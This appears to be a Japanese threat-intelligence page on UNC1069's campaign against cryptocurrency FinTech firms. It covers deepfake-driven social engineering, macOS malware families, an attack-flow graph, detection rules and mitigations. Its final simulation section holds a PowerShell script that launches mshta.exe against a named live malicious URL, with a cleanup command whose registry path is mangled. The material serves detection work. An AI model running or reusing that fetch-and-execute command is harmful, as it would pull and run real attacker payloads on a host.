フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
北朝鮮と関連のあるUNC1069は、AI生成のディープフェイクビデオ、侵害されたTelegramアカウント、偽のZoomミーティングを組み合わせた多段階の侵入を使用して、暗号通貨FinTechを標的にしました。
調査
Mandiantは、macOSホスト上で新たに観察されたSILENCELIFT、DEEPBREATH、CHROMEPUSHを含む7つのマルウェアファミリーを特定し、また既知のダウンローダーSUGARLOADERも確認しました。この連鎖は、悪意あるドメインからペイロードを取得するClickFixスタイルのコマンドから始まり、その後、資格情報、ブラウザーデータ、およびメッセージングコンテンツを盗むローダーやバックドアを通過しました。後のステージでは、ディスク上の痕跡を最小限に抑えるためにモジュラー、メモリーレジデント実行を使用しました。
緩和策
ソーシャルエンジニアリングチャネル全体での検証を強化し、署名されていないスクリプトの実行を制限し、異常なcurlまたはmshtaの使用を監視します。macOSでは、コード署名と開始デーモンの制御を実施し、TCCの権限および未知のファイルに対するネイティブメッセージングホストディレクトリを監査します。
対応策
エンドポイントを隔離し、コマンドラインアーティファクトを保存し、悪意ある起動デーモンplistを回収し、特定されたすべてのC2ドメインをブロックします。鍵束、ブラウザー、Telegramの資格情報をリセットし、残存するローダーのスイープを完了します。非承認アクセスに対する影響を受けたアカウントをレビューし、封じ込めを調整します。
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>アクション</b> – <b>T1204.001 ユーザー実行</b>: 悪意のあるリンクが侵害されたTelegramアカウントと偽のZoomミーティングを介して送信されました<br/><b>説明</b>: 被害者はコマンド文字列をコピーして実行しました"] class action_initial_access action tool_telegram["<b>ツール</b> – <b>名前</b>: Telegram (侵害されました)<br/><b>役割</b>: 悪意のあるリンクの配信チャンネル"] class tool_telegram tool tool_zoom["<b>ツール</b> – <b>名前</b>: Zoom (偽のミーティング)<br/><b>役割</b>: ソーシャルエンジニアリングのベクトル"] class tool_zoom tool action_execution_unix_shell["<b>アクション</b> – <b>T1059.004 Unixシェル</b>: curlコマンドをzsh経由で実行してWAVESHAPERをダウンロード<br/><b>説明</b>: バックドアをダウンロードして実行します"] class action_execution_unix_shell action tool_curl["<b>ツール</b> – <b>名前</b>: curl<br/><b>目的</b>: リモートペイロードの取得"] class tool_curl tool malware_waveshaper["<b>マルウェア</b> – <b>名前</b>: WAVESHAPER<br/><b>機能</b>: バックドアがダウンロードされて実行されました"] class malware_waveshaper malware action_execution_mshta["<b>アクション</b> – <b>T1218.005 Mshta プロキシ実行</b>: mshtaを使用してHYPERCALLダウンローダーを取得して実行します"] class action_execution_mshta action tool_mshta["<b>ツール</b> – <b>名前</b>: mshta<br/><b>目的</b>: リモートのHTMLアプリケーションの実行"] class tool_mshta tool malware_hypercall["<b>マルウェア</b> – <b>名前</b>: HYPERCALL<br/><b>機能</b>: mshta経由で実行されたダウンローダー"] class malware_hypercall malware process_launch_daemon["<b>プロセス</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>目的</b>: システム起動時にSUGARLOADERを実行します"] class process_launch_daemon process malware_sugarloader["<b>マルウェア</b> – <b>名前</b>: SUGARLOADER<br/><b>機能</b>: 永続的なコンポーネント"] class malware_sugarloader malware action_defense_evasion["<b>アクション</b> – <b>T1027.004 配達後にコンパイル</b>: RC4を使用して設定を暗号化し、C2 URLを隠します"] class action_defense_evasion action malware_deepbreath["<b>マルウェア</b> – <b>名前</b>: DEEPBREATH<br/><b>機能</b>: Keychainおよびブラウザストアへのアクセス"] class malware_deepbreath malware action_cred_keychain["<b>アクション</b> – <b>T1555.001 Keychain</b>: macOS Keychainから資格情報を抽出します"] class action_cred_keychain action action_cred_browser["<b>アクション</b> – <b>T1555.003 Webブラウザ</b>: Chrome Brave Edgeからクッキー、ログイン、拡張機能を抽出します"] class action_cred_browser action malware_chromepush["<b>マルウェア</b> – <b>名前</b>: CHROMEPUSH<br/><b>機能</b>: ブラウザ拡張機能キーロガー"] class malware_chromepush malware action_keylogging["<b>アクション</b> – <b>T1056.001 キーロギング</b>: 悪意のある拡張機能を介してキーストロークをキャプチャ"] class action_keylogging action action_local_staging["<b>アクション</b> – <b>T1074.001 ローカルデータステージング</b>: 収集されたデータを一時ディレクトリに保存します"] class action_local_staging action action_remote_staging["<b>アクション</b> – <b>T1074.002 リモートデータステージング</b>: ステージされたデータをcurlを使用してC2にアップロードします"] class action_remote_staging action action_c2_http["<b>アクション</b> – <b>T1102.003 ウェブサービス片道</b>: HTTP POSTを介して抜き取られたデータを送信します"] class action_c2_http action action_exfiltration["<b>アクション</b> – <b>T1020 自動抽出</b>: データをC2サーバーに自動的にアップロードします"] class action_exfiltration action %% Connections action_initial_access –>|uses| tool_telegram tool_telegram –>|delivers link to| tool_zoom tool_zoom –>|leads to| action_execution_unix_shell action_execution_unix_shell –>|executes| tool_curl tool_curl –>|downloads| malware_waveshaper malware_waveshaper –>|triggers| action_defense_evasion action_initial_access –>|also triggers| action_execution_mshta action_execution_mshta –>|uses| tool_mshta tool_mshta –>|retrieves| malware_hypercall malware_hypercall –>|installs| process_launch_daemon process_launch_daemon –>|starts| malware_sugarloader malware_sugarloader –>|loads| malware_deepbreath malware_deepbreath –>|performs| action_cred_keychain malware_deepbreath –>|performs| action_cred_browser malware_deepbreath –>|installs| malware_chromepush malware_chromepush –>|executes| action_keylogging action_keylogging –>|stores data in| action_local_staging action_local_staging –>|uploads via curl to| action_remote_staging action_remote_staging –>|sends data to| action_c2_http action_c2_http –>|facilitates| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
攻撃の流れ
検出
可能なSystem_profiler列挙の試み(プロセス作成経由)
見る
関連コマンドの検出による疑わしいLOLBAS MSHTA防御回避行動(プロセス作成経由)
見る
可能なシステムアップデート列挙の試み(プロセス作成経由)
見る
疑わしいCurl実行の試み【MacOS】(cmdline経由)
見る
デバイス列挙のためのPnPtUtil(cmdline経由)
見る
可能なシステム列挙(cmdline経由)
見る
IOCs(HashMd5)による検出: UNC1069が新しいツールとAI支援の社会工学を用いて暗号通貨セクターを狙う
見る
IOCs(HashSha256)による検出: UNC1069が新しいツールとAI支援の社会工学を用いて暗号通貨セクターを狙う
見る
UNC1069 MacOS感染ベクトル via ClickFix【Linuxプロセス作成】
見る
UNC1069 ClickFix攻撃コマンド実行【Windowsプロセス作成】
見る
シミュレーションの実施
必須条件: テレメトリとベースラインのプレフライトチェックが通過している必要があります。
根拠: このセクションでは、検出ルールを起動するために設計された敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと物語は特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的とします。
-
攻撃の物語とコマンド:
フィッシングメールを通じて初期の足場を得た攻撃者は、mshtaからの悪質なHTMLアプリケーションを取得するために使用しますhttps://mylingocoin.com/audio/fix/6454694440。このHTAファイルには暗号マイニングマイナーをインストールするPowerShellペイロードが含まれています。HTAを起動する前に、攻撃者はsetx audio_volume 100を実行して、オーディオサブシステムが既知の状態にあることを確認します(ClickFixキャンペーンのいくつかのバリアントはオーディオ設定を操作してポップアップを隠します)。この両方のコマンドは直接PowerShellコンソールで実行され、Sigmaルールに正確に一致するCommandLineフィールドを生成します。 -
回帰テストスクリプト:
# UNC1069 ClickFix攻撃のシミュレーション – Sigmaルールをトリガー # ステップ1: 無害に見える環境変数を維持(検出に一致) setx audio_volume 100 # ステップ2: 悪質なHTAを実行 - ルール検出で使用された正確なURL $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # オプション: HTAが起動するのを数秒待ちます Start-Sleep -Seconds 5 -
クリーンアップコマンド:
# 以前設定された環境変数を削除 reg delete "HKCUEnvironment" /v "audio_volume" /f # テストによって生成された残存するmshtaプロセスを終了 Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force